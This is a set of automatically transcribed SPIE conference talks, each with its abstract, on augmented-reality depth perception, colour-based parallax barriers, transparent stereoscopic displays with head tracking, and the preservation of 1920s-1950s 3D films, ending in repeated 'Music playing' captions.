example, if we occlude correctly the auxiliary augmentations, we can very efficiently anchor the auxiliary augmentations to the scene. In this study, we focus on action space and objects above ground plane, so we can ask where to add these auxiliary augmentations. And they are shown as a green in this figure. First of all, you have to limit disparity range for the objects. And take into account disparity, a gradient shown here, so we want to avoid the diplopic images. And also the horizontal position of augmentations should be limited, so that the unnecessary head movements can be avoided, so that the objects are closed horizontally to the AOI. And in addition, also the vertical position should be limited, so that it has been shown that the ground perception is very important issue within action space. Does we want to guide the observer's attention towards ground? Does we want to visualize these auxiliary augmentations below the height level? No, I level of the height. And on the right there is an example, steamily used in our experiment. These auxiliary augmentations are anchored to the scene using shadows, and there is an auxiliary augmentation near and auxiliary augmentation far. And the position of the AOI is judged by participants. And here is an experimental setup that we used. We had 18 participants, and a stereo variable had mono and stereo conditions. And a variable had two conditions with and without AOIs. The height position of the AOI was parried between half meter and meter. And the distance of AOI was parried between 6, 7, 8 and 10 meters. And all the combinations were shown twice to the observers. This is the video see-through display we used in the experiments. And for recording the judgments from the observers we used a physical pointer. We had an observer pulling strings with his bowed hands, so that she was able to adjust the position of the physical pointer to the same distance as she perceived the position of augmented object of interest. And here is the same situation from the side. Here are some of the results of the study. We can see that the stereo variable had a significant effect on judgments. And also the AA condition had significant effect on judgments. And the most accurate death judgments were achieved when these combinations were combined. And there were lots of variations between the slopes of the judgments. For example, when the objects were one meter above the ground, the slope of the judgments with mono condition was only like 0.09. And with the most accurate condition the slope was 0.95. And in addition, the height position had significant effect on judgments, especially with the mono condition, but the effect is less with the stereo condition. And also the confidence of the judgment was measured, and the results are quite similar as with judgments. The confidence varied significantly according to the viewing condition, and the height position had an effect on death judgments. And as we can conclude that also the ground has significant effect on judgments, as closer the objects were to ground, the more confident answers was gained. And also there was an interaction effect between distance and height position. At near distances the height position had more influence on confidence on judgments. So as discussion, the slopes were varied a lot between viewing conditions, and relative size affected the scaling of the disparity, meaning that when the relative size queue was available in the scene, the disparity was scaled more correctly. And death and confidence judgments were less affected by height position with stereoscopic viewing condition. And conclusion, stereoscopic perception relative size were combined in additive manner so that the death perception was most accurate when the queues were combined. And this auxiliary augmentation approach is applicable in situation where the augmented object of interest cannot be anchored itself to the real world. This is, for example, case when the AOI is viewed from the perspectives that hide the ground plane, for example through windows, or in cases where the ground is not visible. And also in cases where the augmented object of interest is behind the wall, this approach has been shown to be very useful in previous study. And also in situation where the AOI is too far to be accurately anchored, for example many depth sensors, their accuracy decrease as a function of depth. So if we position the relative augmentation, this auxiliary augmentation to the near, then we can deduce the position of AOI that is quite far using relative depth queues. Thank you for the time and I have maybe time for questions or...
|
CONTEXT: Depth perception is an important component in many augmented reality (AR) applications. It is, however, affected by multiple error sources. Most studies on stereoscopic AR have focused on the personal space whereas we address the action space (at distances beyond 2 m; in this study 6-10 m) using a video see-through display (HWD). This is relevant for example in the navigation and architecture domains. OBJECTIVE: For design guideline purposes there is a considerable lack of quantitative knowledge of the visual capabilities facilitated by stereoscopic HWDs. To fill the gap two interrelated experiments were conducted: Experiment 1 had the goal of finding the effect of viewing through a HWD using real objects while Experiment 2 dealt with variation of the relative size of the augmentations in the monoscopic and binocular conditions. METHOD: In Experiment 1, the participants judged depths of physical objects in a matching task using the Howard-Dolman test. The order of viewing conditions (naked eyes and HWD) and initial positions of the rods were varied. In Experiment 2, the participants judged the depth of an augmented object of interest (AOI) by comparing the disparity and size to auxiliary augmentations (AA). The task was to match the distance of a physical pointer to same distance with the AOI. The approach of using AAs has been recently introduced (Kytö et al. 2013). The AAs were added to the scene following literature-based spatial recommendations. RESULTS: The data from Experiment 1 indicated that the participants made more accurate depth judgments with HWD when the test was performed first with naked eyes. A hysteresis effect was observed with a bias of the judgments towards the starting position. As for Experiment 2, binocular viewing improved the depth judgments of AOI over the distance range. The binocular disparity and relative size interacted additively; the most accurate results were obtained when the depth cues were combined. The results have similar characteristics with a previous study (Kytö et al. 2013), where the effects of disparity and relative size were studied in X-Ray visualization case at shorter distances. Comparison of the two experiments showed that stereoscopic depth judgments were more accurate with physical objects (mean absolute error 1.13 arcmin) than with graphical objects (mean absolute error 3.77 arcmin). NOVELTY: The study fills the knowledge gap on exocentric depth perception in AR by quantitative insight of the effect of binocular disparity and relative size. It found that additional depth cues facilitate stereoscopic perception significantly. Relative size between the main and auxiliary augmentations turned out to be a successful facilitator. This can be traced to the fact that binocular disparity is accurate at short distances and the accuracy of relative size remains constant at long distances. Overall, these results act as guidelines for depth cueing in stereoscopic AR applications.
|
10.5446/32374 (DOI)
|
Thank you for introduction. And I also want to say thank you to Mr. Stephen Kies for helping us these days. Okay, good afternoon, everyone. As the title shows today, I would like to introduce Time Division Multiplexing Parallax Barrier based on primary colors. My name is Chi Zhang and I'm from the University of Tsukuba, Japan. I will start from the background. As introduced in the first presentation of this session, conventional Parallax Barrier is easily attachable and has already been used in some of the products. However, it suffers from two main issues. Low resolution preview and narrow viewing zone. The first issue can be resolved by Time Division Multiplexing, TDM, Parallax Barrier, or Wutor High Resolution Panels. Well how tracking is regarded as a helpful way for the second issue. By tracking the position of the viewer and adjusting the barrier accordingly, three spots can be increased. However, since the range of each three spots is very narrow, both high precision and short response time are required for the involved head tracking. Furthermore, barrier panels made of LCDs can be adjusted smoothly since they have a minimum limit of one pixel. So as shown here, some of the areas can't be covered perfectly. So perfectly contiguous viewing zone is impossible. We have been working on the high quality autoscleroscopy system based on TDM Parallax Barrier, which shows full panel resolution preview and holds contiguous viewing zone with common head tracking involved. And here is the method. First, we set the aperture ratio to one quarter, so the system will be a four view system. Then with quadruple TDM applied, four resolution preview can be achieved, where one frame shows one quarter of the resolution and four frames show the complete four view. So here is the four view. If we apply the left image of a stereo pair to the left viewpoints DC and show the right one to the viewpoints BA, the system will turn to a two view system with a wider viewing zone. In detail, the viewing zone of each eye can be determined by these lines. And now it is plain to see if we set the distance between A and C to the eye distance. The widest viewing zone will be achieved, where the width of the three spots is half eye distance, and the viewing zone of auto-scaroscopy will be like this in a diamond shape. So we define the ideal view distance to D0, S0, D0. Then the viewing zone of this system can be extended to two thirds D0 to twice D0, as shown here. And now just imagine we have been head tracking and shift the barrier by one pixel. You can see from here the joining two viewing zones share enough space so that the continuous viewing zone is available. We carried out a prototype based on two LCDs and a specifications are listed here. We also used an AMD GPU which supports I-finities technology and display port to ensure that images on two panels are strictly synced. And as a result, continuous viewing zone without crosstalk has been achieved with common head tracking involved. However, in this system, flicker standout is widely known that a refresh rate of 240 Hz is required for flickerless quadruple TDM. Well, such LCDs are still rare at this moment. So we proposed an improvement called one pixel aperture based on sensory properties to remove flickers. You may refer to our last paper to find the details of this method. So here's a squat structure of the improved system. You may see some adjustments here like the order of the panel and also we inserted a diffuser here. But the main concept of the proposed method has been kept. Since this barrier type uses a barrier, they like white, black, black, black, we call this barrier type WKKK. With this WKKK system, high quality auto-strile scoping has been achieved, but still one issue remains. In the current system, when the viewer blinks or takes a secard, uniform stripe pattern will be seen as shown in this picture. In such situations, humans become more sensitive to 60 Hz change, where the pattern from two frames will be striking in this system. As you see, WKKK plus KWKK create a WKKK, a uniform pattern. This kind of noise is similar to flickers where a lack of refresh rate takes place. So to weaken the stripe noise, we propose a barrier based on TDM and glyph. As you see here, we use a barrier like green, black, magenta, black, and we call it GKMK. It also takes four frames to show four complete views, but the pattern from two frames turns to GGMM. It is widely known that humans perception of luminance depends on RGB components respectively. And from the percentage, we may estimate the luminance distribution of the stripes like this. It is plain to see green and magenta hold closer luminance and may show weaker stripe noise. Here shows the result. By using green and magenta and glyph, stripe noise becomes much weaker. However, using glyph increases crosstalk. As shown here, when showing alphabets A and B as a stereo pair, a ghost of V will be seen from a sweet spot of A. RGB color filters on LCDs share certain range of wavelengths as shown in this graph, which means that they can separate colors clearly. If you define the shared areas as PQ, then the crosstalk quantity of each anaglyph mode can be estimated like this. It is plain to see the mode we used holds the largest crosstalk quantity. On the other hand, red and blue anaglyph shows less crosstalk, but since the range of wavelengths is narrow, the crosstalk will have a certain color tone. So for a short summary, it seems that a tradeoff between crosstalk and stripe noise exists and is difficult to deal with the two issues at the same time. So we would like to propose a method which may bring more balanced results. And here is a new method. We call it Paris Barrier based on primary colors. As you see here, it holds a barrier laid like RGBK. And it also takes four frames to show four complete views. Since we show the same images to A, B and C, D, the color filter in this system will be like this. Only red, cyan, anaglyph, and yellow, blue, anaglyph takes place. So we can estimate the quantity of crosstalk of each pixel like this. And the average crosstalk will be like this. It's plain to see compared to green magenta anaglyph, crosstalk becomes much less and also stays away from color tone. On the other hand, the pattern from two frames has luminous values jump, so maybe relatively strong stripe noise may take place. In this kind of barotype, by changing the order of the colors, results may change. You may see from here the RGBK alignment shows less crosstalk, where another type, RBGK, will show less stripe noise like here. You may see luminous distribution is even and relatively weaker stripe noise may take place. And on the other hand, crosstalk may increase a bit. We carried out an experiment to find how barotypes work. The following five barotypes have been involved in these experiments. First crosstalk. The detailed information on this experiment is listed here. And the result is here. You may see without anaglyph, the mark is highest and with green magenta, the mark is lowest. And the newly proposed method RGBK shows high mark as expected. Then stripe noise. You may see from here the modes RGBK show close marks. So we can see human beings can't tell a difference when the stripe noise gets weak. Then we show the two results on one graph. Maybe not perfectly, but you can see a tradeoff exists here. And the newly proposed methods based on primary colors, RGBK and RBGK, together with the R mode, they all show more balanced results. And among them, RGBK is considered to be more practical since it shows less crosstalk. Here's the conclusion. For the future, we're considering to use displays with higher refresh rate since LCDs with refresh rate of 144 hertz have already appeared on markets. That's all. Thank you for your attention.
|
4-view parallax barrier is considered to be a practical way to solve the viewing zone issue of conventional 2-view parallax barrier. To realize a flickerless 4-view system that provides full display resolution to each view, quadruple timedivision multiplexing with a refresh rate of 240 Hz is necessary. Since 240 Hz displays are not easily available yet at this moment, extra efforts are needed to reduce flickers when executing under a possible lower refresh rate. In our last work, we have managed to realize a prototype with less flickers under 120 Hz by introducing 1-pixel aperture and involving anaglyph into quadruple time-division multiplexing, while either stripe noise or crosstalk noise stands out. In this paper, we introduce a new type of time-division multiplexing parallax barrier based on primary colors, where the barrier pattern is laid like “red-green-blue-black (RGBK)”. Unlike other existing methods, changing the order of the element pixels in the barrier pattern will make a difference in this system. Among the possible alignments, “RGBK” is considered to be able to show less crosstalk while “RBGK” may show less stripe noise. We carried out a psychophysical experiment and found some positive results as expected, which shows that this new type of time-division multiplexing barrier shows more balanced images with stripe noise and crosstalk controlled at a relatively lower level at the same time. © (2014) COPYRIGHT Society of Photo-Optical Instrumentation Engineers (SPIE). Downloading of the abstract is permitted for personal use only.
|
10.5446/32375 (DOI)
|
So, my talk will be about Transparency, Aeroscopic Display and Application. And let me first start with a small motivation, wide transparency. You see on the left an image from Swiss train station. You see this typical information panels which are huge hanging from the ceiling, giving information about the departures of the trains. And on the right hand side you see a typical scene if you go shopping, where you see some promotions in the shop window. And both images share something in common. They expose important information to a viewer, but also they block important content from the background. The third image I took from our lab, it's actually our lab kitchen. On the right hand side you see the most important thing in the lab, the coffee machine. But to this talk more important is the fridge, because our people just put their stuff in the fridge and expiry date vanishes and it starts smelling. So what do we want to say with this picture? It would be very convenient for us as users if the door of the fridge would be transparent. And also 3D, such that next to each item in the fridge we can display information about the owner of the item and also about like the expiry date or something like this. So transparency will definitely add value to our environment since we can augment it with virtual information. The idea of the transparent fridge has been picked up by industries already, so LG and also Samsung I think have one, have these fridges with transparent doors. Samsung has this light box, which we already heard earlier today, where you can put some item inside of it and put some information on front. Both are based on LCD technology. The problem with LCD, if it's a black and white LCD, it absorbs at least 50% due to the underlying technology. If you want a color screen, it even absorbs more light. So these technologies can only be deployed in environment with a controlled background light. And usually the backlight is very strong, has to be very strong to get these nice images, as we can see here. Another display technology which I like a lot is from Sun Innovations. They deploy a phosphoric material inside of a glass panel. This phosphoric material can be activated by a certain wavelength of light. So it's a projection setup and it becomes self-emissive, very nice technology. And also something to mention here are head mounted displays, which also can overlay virtual information with reality. Now for the rest of the talk, I want to focus more on this pack projection kind of screens like on the right. But we used more simple ones in our project and we compared two kinds of pack projections with transparent back projection screens. So first the top one is the isotropic back projection screen. As it works, usually they deploy small droplets inside of a transparent material. Most of the light will just pass through. This gives the screen transparent clear feature. But some of the light will scatter at these droplets and make a projected image visible. It's isotropic because you can put the projector at any position behind the screen and it will work. A little bit more complex is the anisotropic back projection foil or glass which only selectively diffuses light. So these screens, the one we used is holography based so it's a diffraction grating and it just selectively from one center of projection diffuses the light, which means all light from the environment will just pass through giving again a transparent screen. But if you put a projector into this optimized center of projection, this will be visible to a viewer in front. We compare both screens by putting just a checkerboard behind the screen and taking a photograph in front and compared to the ground truth without any screen. And what you can see here is that the isotropic screen has a little bit less contrast which is due to that all environment light, even ambient light will be scattered by the screen. The anisotropic is a little bit better in terms of contrast because it only selectively diffuses light coming from the projector itself. We also compare both screens to passive and active glasses to be used together with those. You will find the complete summary and also this table in our paper. Something I want to highlight here is the light inefficiency of the anisotropic screen. The problem is that the first order diffraction will just pass us through directly and won't be diffused and won't be redirected as illustrated in the figure. So there is a huge light loss. Anyway we have chosen for our project the anisotropic glass in combination with passive glasses because first of all we like the nice contrast and the nice image quality of the anisotropic screen and for the passive glasses it's just convenient because they are cheap and we can just hand them out to possible viewers. So now about rendering content, it has already been mentioned in the two talks before. If you don't have any motion parallax, if you render something and you move your head and don't adapt the rendering then you will see a shift in the rendered object behind. This will get worse with transparent screens because with transparent screens you have the reality, the surrounding reality as a reference point. So you will notice this shift if you don't have motion parallax even more with those screens. So if you just render the same content for a Novel View point you will see that the star in this sample will shift as indicated by the red line but what we rather want to have is a re-rendering, so an offset in the image plane of this star such that it is perceived to not move at all. In our system we use the Kinect head tracker to get an estimate of the viewer position. Now the problem with the Kinect and other head tracking systems is the frame rate as well as the latency. Why is that? Imagine that you have an update from the head tracker and you render the corresponding frame then you start moving your head, the virtual object will shift until you get the next update, 33 milliseconds later in the case of Kinect and then this object will jump back. So you get a wiggling of the object if you move your head and this destroys the motion parallax, the feeling, the immersive feeling of motion parallax. So how worse is it? Let's compute through an example with delta t just 33 milliseconds. We assume a viewer motion of 1 meter per second which makes up for offset of 3.3 centimeters between two frames coming from the Kinect. In our setup we just assume equal distance between screen and viewer and screen and virtual object so there is no amplification and this 3.3 centimeters directly translates to the virtual object. And 3.3 centimeters is not too much but it's already enough to destroy the immersive feeling of motion parallax. So we need to do something more clever both about the frame rate, 33 milliseconds and even worse for the latency which is 125 milliseconds for the Kinect. And here we borrow some insights from control engineering as we already heard in the first talk which is called Kalman filtering. And a Kalman filtering is basically a fusion of a physical model and an observation. And in our case we just model the head according to the laws of motion so our state vector is a position s and the velocity s prime and we update the position according to the velocity times the time step. The Kalman filter itself is an execution in two steps so we have first prediction according to our model and then as soon as we get input from the Kinect we correct our prediction to get better state according to reality. And this is a very basic view on Kalman filtering. Kalman filtering is much more complex so it's also very interesting and I want to recommend if you are interested to read related work about Kalman filtering. For us here it's just most important that the Kalman filter can be used to super sample this discrete signal that we get from the Kinect to create an arbitrary smooth curve as well as we can do a prediction. Prediction is good to get along with the latency of the Kinect. So what do I mean with that? Let's have a look at this plot you see on one axis the time and on the other axis the position of the head so it's a motion like from the head to the left to the right and back to the middle again. The black dots is the sampling signal of the Kinect and the black line through these dots is what you get by purely filtering so we can at least account for this 33 milliseconds which correspond to the frame rate by smoothly interpolating which the Kalman filter does itself already but also we can predict the signal. An ideal prediction of the signal would be just a shifted replica to the left in this plot and you can already see like on the orange line that it pretty works very well but on the green line you will see you will notice an overshoot on the top and also on the bottom where the green curve takes some values which are lower than the black line. So what it means for reality is that when you move your head that the predicted curve things your head is further gone further than you really did and this is again a problem because this overshoot destroys again the immersion. So with this prediction we have to be careful. We have to predict to account for the latency but if you predict too much then we get problems at the end of the motion and you need to find a good balance and in our case we found that half the latency of the Kinect was a good balance between these two errors. So the system that we propose consists of an anisotropic glass which you can see in front with the rendered Ironman on top of it. We use two projectors with linear polarizers in front with cross polarized axis and the viewer is required to wear corresponding linear polarizing glasses. You also see the Kinect in the front and in this image we didn't use any polarizer in front of the camera which captured this image so you see the double image of the Ironman. Calibration is very simple we just project checkerboards in both projectors and we compute the homographies between projector coordinates and display coordinates and to the rectification according to that. Another something I want to highlight is that all components are off-shelf so you really can take our paper look up the references by the components and assemble the display at home and you should really try it out because it's a very immersive feeling that you get. So the visitors of our lab liked it a lot. We think mostly it comes from the transparency as I mentioned you get like this reference points from the reality from the surrounding and also because it's a good accommodation queues and then overlaid with this the virtual reality which has still the ghosting effect which will probably be overcome by Quinn's inventions he just presented before. But also the light white glasses and the motion parallax add like the immersive to the immersive feeling and people walked around and could see Ironman from all sides. Supported is also the true size of Ironman he really is life size and you really get the feeling as if he's standing behind the glass panel. The problem however if you move faster then you get this overshoot and you lose this immersion and it looks like a rendering again. So as a conclusion we are approaching we are not completely there yet but with the next generation of head tracking which have higher frame rates and also low latency we can apply the same technique and we will get a good motion parallax and good immersion into this autostereoscopic content. With this I want to conclude I want to thank you for your attention and maybe there's time for some questions.
|
Augmented reality has become important to our society as it can enrich the actual world with virtual information. Transparent screens offer one possibility to overlay rendered scenes with the environment, acting both as display and window. In this work, we review existing transparent back-projection screens for the use with active and passive stereo. Advantages and limitations are described and, based on these insights, a passive stereoscopic system using an anisotropic back-projection foil is proposed. To increase realism, we adapt rendered content to the viewer's position using a Kinect tracking system, which adds motion parallax to the binocular cues. A technique well known in control engineering is used to decrease latency and increase frequency of the tracker. Our transparent stereoscopic display prototype provides immersive viewing experience and is suitable for many augmented reality applications. © (2014) COPYRIGHT Society of Photo-Optical Instrumentation Engineers (SPIE). Downloading of the abstract is permitted for personal use only.
|
10.5446/32379 (DOI)
|
Hello. So my name is Jeff Joseph and for 20 years from 1989 to 2009 I ran Cebukat Productions down in Palmdale. We started out as a film broker. I was buying and selling film prints to collectors and archives and we kind of morphed into a stock footage house. We had 50,000 trailers. That was our specialty, coming attraction trailers. And then we wound up having the largest stereoscopic 3D collection in the world also. I purchased from Bob Furmanack who had started the 3D archive years earlier. I purchased his collection and then we added to it over the years. And so we were able to do 3D expos at the Egyptian Theater in Hollywood in 2003, 2006 and last September we did the last one, which definitely will be the last one because film was pretty much dying and it's getting harder and harder to run 35 millimeter dual interlock pretty much anywhere. When I approached the American Cinematheque and the Academy and UCLA about doing a 3D expo back in 1953, back in 2003 rather, 50th anniversary from 1953, they had two major objections to doing it. One was it would cost too much and we would never recoup our costs, which turned out to be really true. And the other problem was there weren't any prints, other than like House of Wax and a couple of others, the studios didn't really have much. But between the material I bought from Bob Furmanack and then the material that Grover Crisp at Sony was incredibly generous. He printed up the nine Sony features, fourth Columbia features and the shorts. We were able to do the expo in 2003 and then in the gap between the two we managed to find a bunch of other stuff. And I'm going to talk to you about some of those. Okay, there we go. Those are the 50 movies from the Golden Age, starting in Buona Devo and ending with Revenge of the Creature. 3D didn't really last too long in the 50s, a little bit over a year. By the time September of 1953 rolled around, a Cinemascope hit. The robe opened at Grumman's Chinese in September of that year and kind of was the final nail in the coffin to 3D. It was much easier for theaters to run Cinemascope than it was to run Dual Interlock 3D. And there were still some things in the pipeline at that point, so there were some releases in 54 and 55, but it was pretty much over within about a year. We ran 43 of these movies between the three expos. Just because we ran them doesn't mean they're necessarily preserved. I mean, the studio titles tend to be the House of Waxes, for example, but I, the jury, for example, only exists as the print that we ran. And that's it. There's no negative, there's no nothing. We did not run these seven movies, and this is basically the reason why. As you can see, Bounty Hunter and the Command were not even sure we're finished in 3D. They were shot that way, but by the time they were finishing them, 3D had pretty much died. Films would have to probably spend some money to make them releasable. The RKO titles are in terrible condition. Louisiana Territory may not even exist at all. At the last expo in 2000, rather last year, less September, we ran 12 minutes of footage of Louisiana Territory that we found in 3D, and that may be all that exists on the movie at all. Of the movies we didn't run, the only one that we could have run was The Moonlighter. It is a perfectly well-preserved film, but Warner's wouldn't make a print for us, unfortunately. Son of Sinbad never got a 3D release. Southwest Passage did get a 3D release, but as you can see, only one and a half negatives exist. The other half of One Eye has vanished. We found half of it in an Italian lab, but the rest seems to be gone. Top Banana is pretty much a lost film, totally. There's just nothing left on it except two prints of One Eye. We found paperwork from 1956 that the company that made it went bankrupt and had a bankruptcy auction. My thought is that whoever bought the material at the bankruptcy auction wound up with it, but there's really no way to track it back, unfortunately. I wanted to talk to you mostly, though. Oh, also, I should mention that of the shorts, there's only one that hasn't surfaced yet, and that's Bandit Island. We found all the other shorts. There are 10 foreign or rather non-English language features, none of which we ran, one of which has been preserved in Italian one, but they wouldn't let us run it, unfortunately. They didn't have a DCP of it. I mostly wanted to talk to you about some of the pre-Golden Age material that we found. As mentioned, there's been 3D since 1915. None of that has managed to survive. However, what has managed to survive is some material from the 20s. The early-est material, and we're going to run some of this, so that's why I'm talking to you about it. The earliest surviving 3D is something called Plasticon. Let me find it in my notes here real quickly. It's called Kelly's Plasticon Pictures. It was shot in Prismacolor by William Van Doren Kelly, one of the 3D pioneers. He was also a pioneer in color photography. What this piece is, it's kind of a demo film, really. It had a—there was—late 1922, it was released as something called Washington Through the Trees. This clip you're going to see has about four or five minutes of that, and then four or five minutes of other footage, which we believe was a second short called Movies of the Future. Since that movie doesn't exist, we can't be sure of that. We think this reel was put together for demonstration purposes to sell the process. Another thing that we're running is—we're labeling it Crespinel footage because that's what George E. Eesman House calls it. Again, it's a reel of nitrate that they were given by the family of William Crespinel. It was shot by Jacob Leventhal and Frederick Ives. Again, we think these are scenes that were kind of cut together as a demo reel. Pathé released several shorts in the 1920s. We think these—we think this footage is from those shorts, but we can't be sure because the shorts don't exist. I want to tell you a story about one of the shorts that we found called A Day in the Country. This is one of the Robert L. Lippert shorts. There were three, Bandit Island and College Capers were the other two. All three had vanished. When the Lippert Library was sold in the 1950s, the person who bought the library deliberately didn't take the shorts. In fact, they said they just didn't want them, so they were all thrown away. All the negatives, all the fine grains, all of it was trashed. With the shorts surface, it's going to have to be in release prints. Well, back when I was dealing film, I would get cold calls from people trying to sell me stuff. I got a call from this fellow named Fred back east. This was about, oh, I think, 10, 12 years ago. He read me a list of film, and it was pretty boring. Then he says, A Day in the Country. I said, Hold it, A Day in the Country? He said, Yeah, I think it's in 3D, anagolith. It's a real faded print. I said, Yeah, I might be interested in that. How much you want? Well, he wanted $300 for it, which was an awful lot of money for a faded Eastman color short. But still, if it's the only one in existence, I didn't blink an eye. I pay pal in the $300, and he vanished. In all the years I was dealing film, that rarely happened, but I rarely got screwed on a deal. But he just vanished. His phone was disconnected. I didn't get the reel. Needless to say, I was unhappy. A friend of mine is a private eye, and I asked him to help me find Fred. Over the next several years, we tracked him. He had serious financial issues that turned out. We found tax liens and all sorts of stuff going on. Finally, in 2006, just before we started working on Expo 2, I thought, Let's give it one more try. This time, I actually got Fred on the phone. He apologized and said he didn't have the money to send me. I said, I don't really want the money. I want the film. He said, Well, I've got some bad news about that. You know that I had a pickup truck and the little place behind the front seat, I had it stuffed back there, and my truck was towed because I didn't pay the payments on it, and I don't know what happened to it. I said, Do you know where it was towed to? He gave me the name of the towing company. I tracked it to there. I called them. This woman answered the phone. I explained what had happened. She put the phone down. I hear this paperwork. I hear a door slam a few minutes later. She comes back and she says, There's this can here, and it's got some film in it. It says a day in the country. Is that what you mean? Yeah, that's what I mean. She charged me another $300 for storage fees, which I paid. I gave her my FedEx number. She FedExed it. I was expecting it the next day. When you know it, there was a big storm back east and FedEx was late. I didn't get my FedEx package that day either. One more day it came, and by goodness there it was, a day in the country. Beautiful condition print. Although it was completely faded, he was right about that. He also had said something rather strange to me. He said that it can't be from 1953. It's got to be from the late 30s, early 40s, because he had run it years ago, and he said that's what it looked like. I said, No, no, no, we know about this. It's from 1953. We have the advertisements and so on. He said, Well, whatever. I got the reel. We took it down to a lab in Burbank, and the late Dan Sims and I transferred it in various different ways. We have hot rod of the equipment to try and extract the left eye and right eye out of this really faded anaglyph print. Then Dan took those two files and he massaged them even further, and we outputted them back to a left eye and right eye stereopair. By God, it worked. There's a little bit of shadowing and ghosting on one eye, but it's not bad at all. I think you'll be very pleased with it. It was the only way to save it after all. I suspect with technology today, we probably could do a little bit better job now. But we did this in 2006. I think it came out pretty good. Another thing we found, I think I talked about the Crespanel reel. The Plasticon is also extracted off a nitrate print, by the way. Plasticon was a 10 minute nitrate reel that again we took to the lab and we extracted the left eye and right eye of. Last thing I want to show you on the reel is something that we call the Norling footage. What it was was John Norling shot some test footage in the 1930s and it wound up being sold to MGM to make audioscopics and new audioscopics, which again were only run anaglifically, never as a left eye right eye pair. But how I got that, these little clips, was a little bit interesting. In 1982, a documentary was being made on the history of 3D called the 3D Movie. It was going to be directed by Leonard Schrader, the brother of Paul Schrader, and produced by Lee Parker and Dean Burko. They had Japanese funding. Don't forget, the early 80s was one of the high points of 3D of Overunder StereoVision 3D. They spent a million and a half dollars doing this documentary, acquiring all these wonderful elements and rare materials. They even had a printstruck and for whatever reason the financing fell through at the last minute and the movie did not get finished. It was kind of a sore point with Leonard Schrader. I spoke to him about this years later and he was pretty upset about it, even as I say, 20 years later after the fact. The story had been that that one print that was struck was under his bed, but he would not confirm that. We did still, what happened was, a storage facility I worked with had a deal with me to call me whenever someone didn't pay their storage bill on film. He called me and said there was 300 boxes of things that were labeled 3D Movie. Do I want them? Yeah, I do. I went down there and I picked the stuff up and that's where this knorling footage came from, where they got it from, I do not know. We found all sorts of interesting stuff there, including some Overunder converted footage from Son of Sinbad, which indicates that in the early 80s, somebody had a left eye and right eye negative of Son of Sinbad, which has since vanished. That few minutes of footage that we had from that may be that all that will ever surface in 3D of Son of Sinbad. I want to run this reel for you and then I'm going to take some questions. Make sure you have your glasses, please. Let's go from there. Let's give it a go. Thanks. Lights, please. Yes, dim the lights, please. Yes, dim the lights, please. Come on in, butch. Get a load of this. Whoops! I bet you thought there was an accident. A smith of mighty man is he, but just between us folks. He's muscle bound above the years. Oh, that's crops! Pick up that beard, we know you. What a character. Far shoes he gives them. Nah, that's for sissy. Yeah, but wait a minute. They got an idea. What a buildup. Imagine what they can do with a pool cue. William Tell had nothing on him. You just know what's going to happen. Oh, I can't look. Now all he needs is a horses tail. Here they are, the cats and jammer kids. Just out for an innocent walk in the country. Say, I might want to like this country life. Oh, come on now, girls. That tickles. Oh, stop! Another one. All right, all right. So you got six more veils. Come on, we're running out of film. Come on, kids, get out of here now and I'll stop that. Here's the girls a chance. We want the girls. Come on in. The water is fine. Hey, just remember, the kids swim. What is this magic at a time like this? The guys will never learn. Exactly. Made a funny. Made a funny. This is no one seeing eye to eye. I'll bet he doesn't eat scramble eggs for a long time. What's so rare as a day in June? Blue skies, trees, apples, inspiration, and what a panorama. That reminds me, what happened to those dancing girls? Oh, the rober boys. Inspiration moves them, maestro. Hey, look out for that brush. Just a few more depth strokes of the brush and another mass of piece will be ready for the ash can. Eh, never touch me. A little clean fun and a quick getaway. They can't do that to you, rimbant. Honest, mama. We were just walking along and minding our own business when this think runs up behind us with a big brush. They're here again. That's right, honey. Keep pissable. Confidentially, do you use that green stuff? Everything is all set here and they go right into the arms of Picklepuss. Get away from us, you pest. Eh, you miss me. You've been waiting for this. That was a farmer's daughter. Ah, they're going to make dairy, huh? Folks, this is going to be a tight squeeze. It's efficiency. That's what it is, direct from the manufacturers to you. Ladies and gentlemen, the motor car of the future. Think it'll work? Hey, come back here. All we need is pictures of hitchhiker. Some fun. Wow, watch that pickup. That was a beaut. And a sea biscuit by a nose. One side of the leg off. Look out. Now grab the wheels. Hey, Seth, watch it. Wow, that hurts. Ah, shut up. Hey, Mom. That figure is coming to no good end. I think it's like 10 more minutes to go. While he's getting that ready, I should note that the day in the country was shot in 1941 in New Jersey. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. This is the oldest surviving 3D footage you're about to see. And there's a bit in here of animation. And there's a bit of a known animation as well. Music playing. We're about to see something called a blinky, which is, they'll explain what it is in a bit. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing. Music playing.
|
3D movies have a long history dating as far back as 1915. Jeff will provide an overview and preservation status of the 1950’s “Golden Age” 3D movies plus several “pre Golden Age” 3D content examples. Through Jeff’s keen interest in early 3D movies and all forms of early film content, he has been instrumental in locating, restoring, preserving and exhibiting many early 3D film titles. Jeff has many interesting and unusual stories to tell of how he helped locate and recover several early 3D movies. The onward march of time, and the ever faster changes in technology now present many challenges for the preservation of early 3D film content, but also offer new opportunities. The rapid replacement of 35mm film projection with digital projection is a key part of this change. Jeff will reflect on the three 3D Movie Expos that he has run in Hollywood which have allowed the public to experience these historical 3D movies once again.
|
10.5446/32229 (DOI)
|
